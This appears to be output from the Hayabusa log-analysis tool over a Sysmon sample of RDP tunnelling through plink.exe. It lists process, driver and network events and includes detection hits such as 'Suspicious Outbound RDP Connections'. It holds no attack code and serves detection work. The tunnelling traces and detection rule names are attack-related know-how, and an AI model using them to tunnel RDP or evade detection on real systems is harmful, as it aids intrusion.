+2019-02-16 19:03:47.086 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 239.255.255.250:1900 () | Dst: 10.0.2.16:59304 () | User: NT AUTHORITY\LOCAL SERVICE | Process: 
C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:03:48.058 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: PC01\IEUser | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x26656 | PID: 2504 | PGUID: 365ABB72-E004-5C67-0000-00107C9B1500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:03:48.078 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\UI0Detect.exe | PID: 2504 | PGUID: 365ABB72-E004-5C67-0000-00107C9B1500,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.141 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 3444 | PGUID: 365ABB72-E014-5C67-0000-0010FCA01500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.151 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 3344 
| PGUID: 365ABB72-E014-5C67-0000-00104AA11500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.221 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\smss.exe | PID: 3444 | PGUID: 365ABB72-E014-5C67-0000-0010FCA01500,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.221 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 2516 | PGUID: 365ABB72-E014-5C67-0000-001013A21500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.231 +09:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\rdpdd.dll | Status: Valid | Hash: SHA1=853533AD0FD5081E57931D98CF5B1CD4ACBF0601,../hayabusa-rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.231 +09:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\rdpdd.dll | Status: Valid | Hash: SHA1=853533AD0FD5081E57931D98CF5B1CD4ACBF0601,../hayabusa-rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.231 +09:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\rdpdd.dll | Signature: Microsoft Windows,../hayabusa-rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 
19:04:04.231 +09:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\rdpdd.dll | Signature: Microsoft Windows,../hayabusa-rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.351 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 3780 | PGUID: 365ABB72-E014-5C67-0000-001023A71500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.892 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 3064 | PGUID: 365ABB72-E014-5C67-0000-001024B71500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.892 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 3204 | PGUID: 365ABB72-E014-5C67-0000-001090B71500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.962 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: 
C:\Windows\System32\smss.exe | PID: 3064 | PGUID: 365ABB72-E014-5C67-0000-001024B71500,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.962 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 2988 | PGUID: 365ABB72-E014-5C67-0000-001094B81500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:05.092 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.1:49187 (PC01.example.corp) | Dst: 127.0.0.2:3389 () | User: PC01\IEUser | Process: C:\Users\IEUser\Desktop\plink.exe | PID: 2312 | PGUID: 365ABB72-DFAD-5C67-0000-0010E0811500,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:05.092 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.2:3389 () | Dst: 127.0.0.1:49187 (PC01.example.corp) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:05.092 +09:00,PC01.example.corp,3,high,LatMov,Suspicious Outbound RDP Connections,,../hayabusa-rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:05.122 +09:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\VBoxDisp.dll | Status: Valid | Hash: 
SHA1=0D14114598EE4A3080B9F9083AE5A3339D429737,../hayabusa-rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:05.122 +09:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\vga.dll | Status: Valid | Hash: SHA1=00F4056FD5FE28EC255B4521EE18C700BCF9CEEB,../hayabusa-rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:05.122 +09:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\VBoxDisp.dll | Status: Valid | Hash: SHA1=0D14114598EE4A3080B9F9083AE5A3339D429737,../hayabusa-rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:05.122 +09:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\VBoxDisp.dll | Signature: Oracle Corporation,../hayabusa-rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:05.122 +09:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\vga.dll | Signature: Microsoft Windows,../hayabusa-rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:05.122 +09:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\VBoxDisp.dll | Signature: Oracle Corporation,../hayabusa-rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:05.283 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | 
Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 2920 | PGUID: 365ABB72-E015-5C67-0000-00103FC01500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:05.563 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\TSTheme.exe -Embedding | Process: C:\Windows\System32\TSTheme.exe | User: PC01\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x26656 | PID: 3712 | PGUID: 365ABB72-E015-5C67-0000-0010D0C61500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:06.200 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\LogonUI.exe | PID: 3780 | PGUID: 365ABB72-E014-5C67-0000-001023A71500,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:06.200 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\winlogon.exe | PID: 2516 | PGUID: 365ABB72-E014-5C67-0000-001013A21500,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:06.410 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\csrss.exe | PID: 3344 | PGUID: 365ABB72-E014-5C67-0000-00104AA11500,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:06.971 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\TSTheme.exe | PID: 3712 | PGUID: 365ABB72-E015-5C67-0000-0010D0C61500,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command 
and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:49478 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 224.0.0.252:5355 () | Dst: 10.0.2.18:61795 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: fe80:0:0:0:647b:25b7:1cc4:b972:49478 (PC02) | Dst: fe80:0:0:0:80ac:4126:fa58:1b81:5355 (PC01.example.corp) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:5355 (PC01.example.corp) | Dst: 10.0.2.18:61795 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 224.0.0.252:5355 () | Dst: 10.0.2.18:57255 (PC02) | 
User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:5355 (PC01.example.corp) | Dst: 10.0.2.18:57255 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:137 (PC01.example.corp) | Dst: 10.0.2.18:137 (PC02) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:139 (PC01.example.corp) | Dst: 10.0.2.18:49184 (PC02) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:25.488 +09:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\VBoxDisp.dll | Status: Valid | Hash: SHA1=0D14114598EE4A3080B9F9083AE5A3339D429737,../hayabusa-rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:25.488 +09:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: 
C:\Windows\System32\VBoxDisp.dll | Signature: Oracle Corporation,../hayabusa-rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:26.499 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: atbroker.exe | Process: C:\Windows\System32\AtBroker.exe | User: PC01\IEUser | Parent Cmd: winlogon.exe | LID: 0x26656 | PID: 1908 | PGUID: 365ABB72-E066-5C67-0000-00107A001600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:26.529 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\LogonUI.exe | PID: 2920 | PGUID: 365ABB72-E015-5C67-0000-00103FC01500,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:26.529 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\winlogon.exe | PID: 2988 | PGUID: 365ABB72-E014-5C67-0000-001094B81500,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:26.539 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\csrss.exe | PID: 3204 | PGUID: 365ABB72-E014-5C67-0000-001090B71500,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:26.539 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\AtBroker.exe | PID: 1908 | PGUID: 365ABB72-E066-5C67-0000-00107A001600,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:34.871 
+09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:63309 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:34.871 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 224.0.0.252:5355 () | Dst: 10.0.2.18:51695 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:34.871 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:5355 (PC01.example.corp) | Dst: 10.0.2.18:51695 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:34.871 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:62259 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:34.871 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:139 (PC01.example.corp) | Dst: 10.0.2.18:49185 (PC02) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 
365ABB72-5517-5C68-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:46.929 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:59302 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:46.929 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 224.0.0.252:5355 () | Dst: 10.0.2.18:62053 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:46.929 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:5355 (PC01.example.corp) | Dst: 10.0.2.18:62053 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:46.929 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:61049 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 
19:05:46.929 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:139 (PC01.example.corp) | Dst: 10.0.2.18:49186 (PC02) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:46.929 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 239.255.255.250:1900 () | Dst: 10.0.2.16:52122 () | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:59.056 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:55679 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:59.056 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 224.0.0.252:5355 () | Dst: 10.0.2.18:52894 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:59.056 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:5355 (PC01.example.corp) | Dst: 10.0.2.18:52894 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 
365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:59.056 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:64257 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:59.056 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:139 (PC01.example.corp) | Dst: 10.0.2.18:49187 (PC02) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 